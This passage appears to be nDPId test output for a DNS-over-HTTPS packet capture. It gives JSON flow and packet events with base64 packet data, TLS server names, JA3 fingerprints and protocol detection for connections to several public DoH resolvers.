-02431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946739311357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739311357,"pkt":"ZmZmZmZmRERERERECABFAAXUEqtAADsGVKoJCQkKCgAAAQG7yjovh\/Qlsa+7AVAQAHdneAAAFgMDAHoCAAB2AwPsHFeUVovCXmWpA4VyNoqF1JeqKqRwRROYqOPJU94DoSBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3hMCAAAuACsAAgMEADMAJAAdACBGm95D7Gx83XoeinRk1rxGpZA8u1buvy6HtAvs0UM2ZxQDAwABARcDAwAgBCGr5NOssVZ7TUX4BrL7MyB6aRLwiu1feUb2m7o8fLYXAwMKaD942IoOSpCliO6ZHVfN+ruurWUvz7jYgeJjK7SV5aPdpOPU+gCK34wDZjZp50dMaIsg77NAx4MrmJU6wTsTAwZldztvUMpws2wEYMHKWN686r\/ZugmuzBYB3tOPhjCMvk8pBO5Z4lVJQc9Hb1RsJ03QnqO\/EjZsCDIJr3EwAdBfauIjY3hi6AzlRf9VL9JoUREwghpYtzQDH4RvKScS6ISuIZ0qtqLTaSpG1rQC+HJZ6KKhTxZKSTcym6aIqvAR7ZiyINnXnDnxtWbl8cRiOiDv8PdDsr+5E5xwhcf6QYoUCBscXYYl1EwqfCWZLU9EdSEHvyBTgkaNAt3XMqrEl7x4wjZ94SWxkiQsQ3IyHj5ooHHdJLNgfAhAZ1sF3MqWOMepm6yBmJwKpSpxHS0\/\/oYNPpH+52R4vidTCtKs7UfIN9SKrOu0JFbGVqc8M5lplCXOQx4+S48+BecP0sGtTkcShvyBVSAANiwxQTDnS7JinVgGYtRwWjEqrWQJJopko6YuGLn+wkhYZkogv\/onHZtE4hlsg01xAHJ9PxQYxWbOdVfS1w0JvhE5EDMILwTMYm\/YfzaRcfZnN3X3c8PldLUC8Q00rxaePA+7a5mbMlVzZ\/ZKqlpmGHRhU3G\/b+Za7F3XZpTKcWJ\/+pP4OAaUaey+j0NOSrl7D3\/HeWq7P0vSd\/KYIm9oS0ZJvLtsffCfxTm2zwDcPGhRfKW16iadTUvmoczzCHSYvw+n8hl61iMBIgJerq\/CN9KkicrNEfU8QCR9bMF1D3CABgNImMdCKODlAcrpb\/Ya\/cQUwfP\/CWuVsZ3s+sh12SEW9JLfAgHTnuYwcMjbvAf2Fgpb\/+WmXCT93+A3gLKANXIVA2PfvntvndGO4gXYEiHaUhu4qZSsHkkcQJ5rwvJrE4CSJC\/fp+te7FlAxBXZxU3peCLLIMzIhccFKuqNX9+cPYxqAzm+f4FDsJg5KvH5AIh6Nda\/JBKZzhlz2omWzUxsNRCyzYkCR\/6xx8emByUElOOQjp3\/HRm+WaL5aZHnOk2myD86PdWR0IdZibdlJEHJ2\/GXJsQQv95dhA35hvgjWHiQLe0QLkAtPzosLXULXc5d7ytqMATetgFrOl+B+IuaEJAtm5NdT9m+\/Uo1nl\/TbvSaNp5EaxK2DPhV7Vt+vxmsBj23m0aDhv8PPgUfy9wK\/Niqob3bOD6oQrofsTggzpDg\/0PeQx+LRnGU46v4ljhYI4JoQY+cJBFQKWNeFww9uy1s8SJhz9LzcLFv+j30Vt+r4FFm8AZfzHX3wSuBELuShY7dZHSjQzxqOJfeGLr5ThoXw5ldv54ifSY52Lfxp8BkElu7BDDbf4F6XdVR3aRKy8Yk7ooQevFc0GOsxn7jXeMuFiaf9M\/MspabzWIKD5sTaMPvexVqQrSIhAE01MVqTa8zAs1n4D9AszPAZaArvvaw1dpUAGCn22YGrLkylRxMCN07\/HyOXir6cpxUbsvRgSag8LgIuYbY\/Ta1KZ2trDeXprvYofOqOqX\/ep4LHzQHiCFm14LvDzSoMa4qqUdxfJfOjiZQVsJdT+2uThs188toZRMoZsziXxP++fZpO4m\/wGTJ13ciJYHkQjnaWtFJW9KHR4pPyXX3T1W5XcomUZpNi+tnQlSKiXPl02KPyhw0qdY8Z0WoKV536f3wtH00HuTa3UIk1hZxDmxFcYOKvSwc"} -00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311335,"flow_last_seen":946739311357,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1737,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739311357,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946739311358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1616,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1616,"pkt_l4_len":1582,"thread_ts_msec":946739311358,"pkt":"ZmZmZmZmRERERERECABFAAZCEqxAADsGVDsJCQkKCgAAAQG7yjovh\/nRsa+7AVAYAHfZAwAA1xiWPE9sRZ+HRED66TQP2BK\/H\/\/55yXpchOqptSfdmizDwWdekTWC4fynK8Z2sZPt7VLeiJJja8C3BQX9Rz0xZnn1eoThbbJA0Ru7pA+5J7tyanMo4IQcPUIBSO5p49Bymfzm29G5qjErMG7mQ0OPPjTCRaB\/UjgjbKvSEcd8\/qlBT71ZfI4uv2myCBr7kstCCXPIR18CKF+Z2\/VrH6vxRdx\/DMaAsMgc41PzNU7xNOukRDZxOR62YLQKe5TOm9eGAE6qQfGiWVQuBPTBNCMLbyMtxxnLWSXpHUM8lAFCuaK7Kc6QBacccBEf2G6WUxZTWFo3b0bLTLXGsaAdMgEEvX57cRGL6Gq8YWmgloFc0L4YPSBPg4QXqG2603cgV+j6PlTHv6e2HefSTdXdeLXiPRCN345+9Y7w0ERX6leOOccKhVG5SuGrnMow7zmCn7a2KZDo6IK6nPbbrDUtvAROe\/2qAE2VCX9KID9EijWEziQ9XCbVPjeL02DA\/rYN7wYXRiJgCIeBs3cXR7OygqBY2+3+XFzo9TaLSJOjL2D0foR73wSCVhYWptmpzwaIHjhZCo4rI5hdLdI5wijBOAwhmr7WRW8Yv8AQsnvt1Z4coLNvTRubKzb6tX\/Oxf2jOtE8ql46ReYSM8F\/WAKChrNRMIbb1FxJ7q10gZXMDttRcPXX\/qGmHUzaGCJmbtVGS68jgVwThCO60XMMu84lvsX\/Ppf9SgVkWGycwU0+7rBExjec94Gk2PRYtyBh7FtK\/ojKF2Zx1IbH4Ped7sLfGR4i7sMPLWNn+T5wJpId2IpurmzQEup+Wmo7GS+GCV0scp4nxOFT1awumcjwSZT8bYpF93Gq1VRsPaw1Ed8OHX5e5gmoY4MVzie+NT9SEgMn6ichQsu5snHAMbc8\/IWQxw1j4WN38V6zcIh4u4V1Gd7SkhAHeYNQaHO8zyvvE8ImQNU3iYNHLIKvw9jrqWUBqp23GQnf3jir7+jnbT6O6iTPLexjWoZTCF\/FtolEJ0e895tZWyhQDvFKtQE5PBsOvi7\/BalOF7pvRKDn\/re0ni0oWgQPdEaU+LIaPzCC8LkWYd5oE27150iJxzh1Gp8SiKQXDLhLhi579hHj1+ols2JqJH8RdJfR0+VmnJeuW7LLf+BRMSJBXoQCCLgwxC7f\/h7fFu2xKC0W6c42fJZaQRckgm7zcULCvbrdB3\/7TiSzFX4IqscHoIIazQksB3SnhTuJmLtEq0s5iQGUGxfhlMGhmMgzukQ6S3xziGVGLlkCIIbeLTBQrX9TXDN8S1GsZEFqBjMPt\/N1zN3ViQ2J2at2dPSgSFskYDCKI7W279fwmbZs7V8tsMKdl7zI9bVkSm8TK+VOCU7uRHndZTCFD0rVG1nulq\/L99PnlHGAGXK\/CqGETUVVLlDxaOxEAgpjONuItzxylFN2ddXgvj3hTCiDE8O0ZeY5HxF3kaLieLFjiKlcFdLwH+yoWIasdZ5ETRJVqr26OzVYBTCPTfSgbwHD0EdFC3v31MUjg04ocQ4ZiFf7dRFVtWmOWN0r2SpHXy2xEBvMuqeP3vQyXuuz6g6Dn7YZmJY0+sx4Fy9C8oBJAE0ZwKxguZmJv1GeQHP6tU\/veMnBxdJr3tx5OgYDk+909nj4a5TD3cRR1pqKY8PwvBnQ1a7o21Mx6az\/nj775\/EQh2soovj6zthqPP\/vtXFBBG3tG\/sEPeFuYX44cpRhz5K3N4JqP6Lp6W3KZYJ1EwmXdPWiQcbK\/K0dzC4LCmApJnMsipnxLFAxIsyZnv1pRKdZtp6E4ZNkwItTRiePKudtegvLH1+qbg3pXvAj\/AueIMUCY+nZ2bEiLI67RcDAwBgsXSJyFgjJRWpsUIwFa+B3HudQHKrExr60U8JLlKkL\/P\/S+PEy7whFdA90+7WJF1F8DCmOjyvxxrrWdZx35m5pHvRkiSavCeWDYlRzcWBeiUF0TAz0e0CdFpMI0nfm+C5FwMDAEXIcqRX1+3I4YBN1ZyTwBh\/\/IzIU5lJHrJKAnGrUu2ocpCQI2eEwS+zVK0zKk1o2WUWMhhsV2wCrUmzne3qZHF1rWYeRVk="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946739311566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311566,"pkt":"REREREREZmZmZmZmCABFAAFFTLFAAL0GMYcKAAABuYbEN9gaAbsU0wRrjALq7FAYAfY\/sgAAFgMBARgBAAEUAwN53D+IdbyKMqUcdChlG3BH1byG6PSts1pdzll38jdueyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIASid2tq+mdmASZBUTGU5iyt2F1JUvrNCp22BxrDleoO"} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946739311603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311603,"pkt":"ZmZmZmZmRERERERECABFAAuAg39AADQGeX65hsQ3CgAAAQG72BqMAursFNMFiFAQAfVJ7QAAFgMDAHoCAAB2AwNkY5ffptLk\/1RQxoHPHysW3r9+0ddQo4Z3YjqxuStqKyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhxMCAAAuACsAAgMEADMAJAAdACDs3oZu6oN3lGaq4ly6\/hAqFwB\/djty35eYhaI2Lxe7SRQDAwABARcDAwAgv82VBnjlaTkDEuDhSukFo4HH4nI6fax\/zFPW2XozJ0kXAwMOr9L3WKPFCRevhqaVGoGS+x\/kXxxMckfNoOqk04UOi2nffzkls4dz\/6PwTgD2O+tiYezNJxr\/6WpHVX82B1TCh5LVuQtfmobZqrhUuztxfuDnZpjdtqBFN8\/ThU4OUKCLhdBohaEJUJaODtpSPbvHLMo+XUoovzoT0\/zM8eQTXQpCXzBBMJx7xHTAsbkvGn3C+AG5zWAlrqlt8rw8cJvpcKk420r2AjCbqQCcOhIk9fgtrE6sGQpDmvb1eDYkMJL0ZWhtJpArnw4DJbVlN2eqshODC2oEeU4LRs6HxumiPK1q9BAYm9j4B\/VQvljlxD1l2D54nI0XTtCqzYVH05VeNSyKwY99P0gfk5KbNuwMkg76KjoZ0pANDmDoK2O7MRcalHkbOzBtmCZzhD7k0YW7eqNkMU5wTjhw6\/SKqF25gZNB9Nt6RXkKo6zhp67SL4jpzGRuSRzfeNfXwE70s6GkDEHT87ePp0CPZwkccES0koYuFCUJ8ZPaF51CsuO3hEK6HLj90BijpqZSqxhfc1mm\/yqD3lLZlsT6EnUdCBK75PQ4LqFtNj1aZVWZmY0bISdBsjTgcU\/azUhlVpbtuwFzbRgeZMjYItDFV3G2Mz1lBTIG8+EI15TAfiX3THktTEDNdXWRIKZWc6CdSZSTQj5epKSMIDeZ3ym23Y5D0uYv2rRWwF77WpaBXG+MUxbpeWleGLZxmojsUrhsTN3K\/SO4YTnIH3mEDcbuEL\/C6kXZUUc3JKUkSmGmNO61dgMehbma4fB8llee+ia3ZxrMWwvGiTS2tpm78Rjdk2lVGQ4Kw0Hv16lr+xG8BLc4CMV63wU9gsM8SvlR14rXUIcZ1w1IVKRMCPj5\/ktzqCSdsd7JLAu6iqnF+tffAp0R7hABno4kl79WtkvKmhCxs2C9rHaxhWuglRBec9Q1dOU4n\/q5s3oTaT0MWOiB9FA9hPVkcr5rHO5WTaUTZCO3f07agWWupUC0SrT4kMq2F7GC\/qyJUokz54psYmDyksoYU5W4XunHAPWif32UI8qTU8ZnD9BGfH74hn454rDYVO6L7CccMxZlmp851erV6hvxeQE4QFic5+4T+9IQsqcHez2OFejw6vdevdAwPVqE+KjL4UP+MGf4lbUn4WzekrRNg4+OLWhqMW5jPxgVFLL1X\/7LXlyiUW3FZsQlx3wHUnrfnXgRsgIdVSezz4HY0222o0JjMjRIsMAML27omWMbFkL1GH9F5whlSmkQo7tR4pkO8ZObYU6gN63eRur2pr9yUb6mdaHxKmoMOtTc07t4c0mmYRPcKvUuGEq\/qFZAib\/Cn9qtJSED+KsOJFP3lcOvHyBWmDkPTuXhIirjxvNRHlhpCinnvq51BRLv0iIYtLa4+FWzOnZxdtRmb+J7gXcYqMUZr8f9hSbjcXpRs0qTCNkn\/vEFebnj0Oa5wWQ\/wyYqcIXbH0+Qg2t4MHCtt5puUCcnWiddPmXVCEbusxDhj1mW7Wb7s7TbeMJNHqJK2wkpexuwL1VqKOcMpKkVK63qTpeBRS7pKr42\/e4RAue3aCNMwXb2qN+nhV\/yAs+no2\/T8CA38S+A3XjJrTp3nRj3b7uYGTvq6vgcySIveyFsNVxbpOrMNJwA55r7OmJm\/TMMYu1Cmm7ApgsYESAyvVbBcTmlsCXf4kc5\/PCSNGVGXc3ry7HZ6UrNLiBxVinlqk+M5YS+nDMxRpBRZ\/l5jocQH\/hTpYeDeBYM6nlOI3a42ojQOf0qu\/s3tJK0pVMQq+L3fiObQL0w0ki8zB\/Pq94eJzcgGDCpDBI5rSkrXqKSKwE\/TPxGGb4EW3iPF5GMaLLk69BANjmbdOWrRbmSOZIerFLKML4S4ISArr9z\/Hd6jn9grfPQF5QPRgsy72snzNYK+cdD78EVK3JLSsYYqn88MbAXaWnvt\/NrtPJL0QXd+HGti75Czr60Z2exrtdLfvuyhP6EA\/OJF74UO1DMZkdkO4dBy70z4Gu4gpkQ7cqPDY0GZ19ZQkhDdIe6tY\/KPM4UldVfU5Ox+v3aicLwXXKsL1aYiIDMExLQqDr8Vp6Rg8MhQd15RVUWWezyYpN93w5RckR2WthYnNZNsPa7iVvEbmCiUoUkbzt39o4APEG2T8nb60w4QPGzL8Bs+6zqpdT6PPZQOoSFcrit36uSRZP8iGT1fW72Vs+Zxy5GcZuta5oSW5oky8Ru7NnhXKgfldlxRBIOjtCyzFizIawHPWtdb1FNijZyZVKdj4BP0ocR0b5RYPeWT1DhR9qwqhFmLRHqWhBkA5vK7BpYSEPmeNp9JvF8mc9PzqPXFx4qv46sa0RB9Om1TkSniqOmaKfC0VJ55FKEd3mCSVa1mQ2nzlNyLUC\/G6NFqNfA87dMc8kmjkPDW9L4TPuUdk6cFk2SWFMlOT4UEAqyKhiuK9S2TSwt8uFOPCTdi2gCXoEJdX+9z6vM3zP1D618aG60X5Ut6n4\/mqqX3ZYS740az2d1czqYB7kjzMa99L4RSKw9Nv7MMuwMNSxkhAXISg5MWpacHw\/KAdEQ1nUyITpRoICmtn4wFkGI6VHWSC4OZg5gMWs1Z3587N6CIw3eN5rLnfYJ5l6ZBNqLnr+ciVip8x2IDHWDGTGr5OC+uJxAOEMiK+fcS0il3LgKzbRTF6C8+Y0IWjT3NlBZzIZBcCE3FjrijIv+69vNs6VJAKOlSW3f43x0FPmVvFyGHd0hZ6go7pV\/2O1uABkUwtp9Jfvr8prX7E0NzIH8AuTCtktrwjOAvCJu4CHVfpkaygbTIxPH5m45oyD64MuKPbsc5SlgZwhfZunmTwVDMaVpXGfayrmusZgZ\/07zHxvKOvoAfTCZXoYameOeAqJlNLuCW2W26TogT5fb\/9WF1j5kVLVJW3+Xr3WsDu87Z6wA7xpdVjSQWvWXCJ9y6jEXbNwmvXmeHALYBp+DdvlGU6uIsmqv2tJETpbTRkgR+f7Dhm8aD8084eT\/a67jbRGqTJcyCWp8HFxcSFdtdPKZoErFiYrC7xPgwqW36MeKC3pPi5nT9yuHbuL7yiKV4x9J1dDJBmuStOS8bPFHHOamsDufj+1xHeCKIDfJN+meXy0zdvw70PEKqqZXmCwfi2TfqRVP7d77vAzcphP1F9+RnUlovNNUieiBKgaaaLwfIEAiD84YhuItQrVIeJCa0jqOgMbgEKi1twm5DKS0bcizlDtDFNkFvRAghS6l8H5MMzc8ps2oVnq34RHWoVdxAXCkHDkkmpkGwGKoEP+YEVOArEfXlh0taA60GiWgLXrspKhJVAnjFiuxV1QiMjD4R5UbJ+BnJTGXsaH\/yPppjwU5bzpYvq1TPW2pdHuooLQ3rQ5gXMFPVeJEv4l3u9D\/o1MxYmTHF6ag0Pg7EYa9IiJh8NJsAWlNoM+jz3\/neEdRD31BwTKccVefTs8giAaZY3hKJ1XXe6Hys7XZMAJR72EIr5DA0qa2euR8ERpA8eew\/h0vqG8NScpvxxA8Cdjmhn\/JwaSSF9ubglNVw4f\/Z3JUgBYq3\/\/+9aFTg5SP56AY5voL2goU8TTHIbBp4JfOUmUTToGPy4GEqVcJNDAs6V2L7PobZ6srGT2l40lZacD46Db+MrlADUrWNBC6GAGEaOIzjsVXO2C7zOXrZPBi"} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311566,"flow_last_seen":946739311603,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739311603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02347{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":946739311604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739311604,"pkt":"ZmZmZmZmRERERERECABFAAWWg4FAADQGf2a5hsQ3CgAAAQG72BqMAvZEFNMFiFAYAfXAzwAArcpCfmGLOKjDkyzsTe+IPkiqYnruzR41MPuGsz88MQqvC3a9HfwXJ6lzqQ4rCWJcWhWOM\/faQczL\/u4LUA47B+3hgIraXqwM7U0QtAPKeofLhsqBn12DazruSHbiIbxy+mEUG3S56+4ZRbB44U5cKRW56AecOVegPdxq19WX7WP4+ZvrOsXSvkcqGqyY6l57+wMNGtK9Hor0ODYeWdBnCWx+J55Yp1BLeNHq9nHIKHj0qCJNcTpuSY3kcxYIKgCzUqmtnXdoJ0GIMlbY2ljKsarNr5cWoMUbBujc0flI7F15VAzRku1eV3Kl\/7Wukzg8w4HiH6xnnC2hyeJ\/S9kg8k3Thktb0MRLph1xkAte3QZc08opc3Fwo1Ft6aRVOUnBzMc2ygQi4cXDCHwkiaI53r8gMzkS7anbEcS4yQcROtN4r2sH3n\/Y2Qw1v5Gb+U\/+RFg8+P9ZzSoFBkttBuC7bMKkuFovtwfD7bmTraXz2TwXRpY3Ao54+\/SNvuV3GwVsY67MLueBEgpQWATGxrbkACZtD4C+lpPBC5\/54MNyZi6y2\/bINiwBN2SHIdC0sG5gR\/DV19ykdqXF3pfYHlmfR3703pqTCdiZz1zhoMZLCPXVwnRt08WzrSf9AJPIVrVED87vfcSxcnSNe9\/uUQ+fPjNxmvMBL8ur1shycxG8A4cFPyuqBeBuBrfVjZFKQN3\/5iT\/qY3bW5kYmBDrHkL2xegzf\/Moa8towjQGmRBeDyc9Fogbi4Bl2lSDI\/x3VZI\/8yRCU0YCrn33V5Yytpt4Nri5jL3CrvqNUKuK49C6RMwZ1n1NkjUcpjeYGCGRXo6SbIn8CHVjiCEwFZ8FbQctAnWvdqfTpT0bXGelftgC9CQThu\/W+ybRqQdwN+K5c2QiXPYvO4kT3LD6oCwacJ4x3t9XRv3AXxYa1UbtXwad0Q5XC17E9XVpbbgKhrlco595yY5V6j1HdG8AkTRI1DXbEp3foy5yEjtW0o9bfHyhwUqC6TBXcyz4z4cHmh5p6A6BMpnvPJtMyGOVMKQ7LtCwwAKXNWcMVkLjSAZ+IrhMtGXoEFJcdmyQxTOI+OfCfdgm6q9yTer0lySMXu3yBMcL6Vn1SuMzS2FSE1aXKAyCBb3XF5Tfnf2rLe4r3hkWTr8Mmu\/+5cpIK1r4NWR0zq6iT\/lnsbxmS39yt3YHMSpG1r36HYatyCzF6kZo6KyW2UJ6fBqDVBmGD6CXSVAKejLC8pL1qmuOu2eXU804WhkOIkczZMz7pQW6C0A+bVJsEuL5Kd7KV\/W2IGcqNMtuMkFf1vHE4VTHRAmWpIDFt5I4ja4qA9N7tAzSWPkgtQseSnNvTrX+nCc0rsjLviAcYafijP+ATzRDOBcDAwEZYz205aORxNiMwaiQeObwk59GyoJ+T+YW4iSATpt8cc0OU+XkwulympL8b+KCt76fJXCt3rgEOglVp2lJQDaaCL0\/EDry33zbH0MtKm5P5nEWpzvQFhaXV1WeS3oS65S\/3UVJT7\/Hm\/AkB6N0iCgWEeK4i80RHGCYRIweyu9kQIUklvy2RlmccKeVQTq37O+\/HqRcQLsrpTkATqOJMvj0MaZ7zkYReeTUbtUUtzasEHVGtHimiktW2DAjF2G7BrMbQnAbkBNJMIcDNYwAwDUJvD2+j752nnR\/ojUHAoRsnlpRRGw8k7CJ0b0wBSknElPWssxoC\/r5K7w37x9u118AdMWjqtzSlF2uDe2PtsgCUxjOE7EkCZxpOWsXAwMARUyGMct3ItX2QiSoGAs2qAHwCi9mgPaAr45Z5ZYVR5NUAg5k1dXUDUazzqq9GbzXT1\/7OFi8y8eMdJWfTGFw9qor9xL6ew=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946739311703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739311703,"pkt":"REREREREZmZmZmZmCABFAAFIvxBAAL0GjQMKAAABMw980MyiAbu+o\/fohj5JlVAYAfZx1gAAFgMBARsBAAEXAwOEmak1ToTEOPVX0jBh7rLNZM1Gt5\/Gr6ZvrmdHklieHSAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zbmwuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIGzt4\/5xvtyifU6VTcrfvT+YrIEhagkzRKKKlOYdvDd6"} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 